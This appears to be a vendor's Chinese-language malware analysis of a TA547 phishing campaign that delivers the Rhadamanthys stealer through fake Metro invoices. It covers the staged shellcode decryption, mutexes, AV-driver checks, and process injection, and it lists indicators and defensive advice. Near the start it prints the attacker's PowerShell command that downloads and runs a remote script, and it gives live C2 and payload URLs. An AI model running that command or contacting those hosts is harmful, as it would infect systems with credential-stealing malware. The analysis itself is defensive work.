【恶意文件】TA547通过邮件钓鱼分发Rhadamanthys窃密软件

攻击链起始于一份伪装成德国零售公司Metro回执发票的钓鱼邮件，附件中包含了一个内含恶意Powershell代码的链接文件，解密后的代码为(New-Object Net.WebClient).DownloadString(‘https://bolibachan.com/g.txt’) | Invoke-Expression。功能为执行远程脚本。

图3 伪装成发票的恶意链接

远程代码的功能很简单，反射加载Base64加密的C#模块，从文件的入口点处开始执行。

图4 疑似GPT编写的powershell代码

此阶段的职能为层层解密，加载最终的载荷模块。第一层Shellcode使用AES加密和Gzip压缩处理。

图5 解密流程

将ShellCode调用过程中需要的参数拼接到解密后的第一层ShellCode尾部，再调用一阶段Shellcode代码。调用过程中，攻击者通过GetDelegateForFunctionPointer和GetFunctionPointerForDelegate方法实现C#和C代码交叉调用。

图6 拼接参数调用Shellcode

ShellCode内存部分布局如下图所示。

图7 数据布局

一阶段Shellcode

第一阶段Shellcode主要负责解密出下阶段Shellcode。随后跳转到二阶段shellcode处执行，地址距shellcode开头偏移0x1000。

首先16字节循环异或解密Redist.FastFat内容，异或密钥为array7。

图8 XOR解密

解密后的数据结构定义如下图所示

图9 结构定义

标志为0xBF0E967B的数据，通过Redist.DecodePkt方法解密，得到第二阶段Shellcode代码。标志为0xCC81FC5D，0xFA9D947F的数据为后续阶段Shellcode参数。处理完后跳转到第二阶段Shellcode。

图10 调用C#托管方法解密

二阶段Shellcode

通过一段汇编代码获取下阶段Shellcode信息，作为解密参数。

图11 三阶段Shellcode信息

再解密出第三阶段Shellcode代码，跳转执行。

图12 解密三阶段Shellcode

三阶段Shellcode

第三阶段Shellcode较为复杂，核心功能是注入加载Rhadamanthys窃密程序，同时也会检测进程权限和系统环境。

图13 手动解析的外部函数

通过下面2个互斥锁判断是否重复运行，GlobalMSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}，Session%uMSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}。

图14 互斥锁操作

通过ZwOpenDirectoryObject ，ZwQueryDirectoryObject函数遍历GLOBAL??内核对象命名空间，判断是否存在特定的驱动模块，其中aswMonflt，k7sentry是可以被利用的ByPass驱动。

图15 模块检测

内存解密出C2服务器地址为https://indscpm.xyz/bbb76d0e13310f0/b91e92i9.75aq5。

图16 C2地址

新建dialer进程注入窃密模块。

图17 注入操作

HASH

c9c11eae676ee5175de350c242c3f0ec

URL

https://indscpm.xyz/bbb76d0e13310f0/b91e92i9.75aq5

https://bolibachan.com/g.txt

1. 避免打开可疑或来历不明的邮件，尤其是其中的链接和附件等，如一定要打开未知文件，请先使用杀毒软件进行扫描。

2. 安装信誉良好的防病毒/反间谍软件，定期进行系统全盘扫描，并删除检测到的威胁，按时升级打补丁。

3. 使用官方和经过验证的下载渠道，使用正版开发人员提供的工具/功能激活和更新产品，不建议使用非法激活工具和第三方下载器，因为它们通常用于分发恶意内容。

【深信服统一端点安全管理系统aES】已支持查杀拦截此次事件使用的加载器文件。

【深信服安全托管服务MSS】以保障用户网络安全“持续有效”为目标，通过将用户安全设备接入安全运营中心，依托于XDR安全能力平台和MSSP安全服务平台实现有效协同的“人机共智”模式，围绕资产、脆弱性、威胁、事件四个要素为用户提供7*24H的安全运营服务，快速扩展持续有效的安全运营能力，保障可承诺的风险管控效果。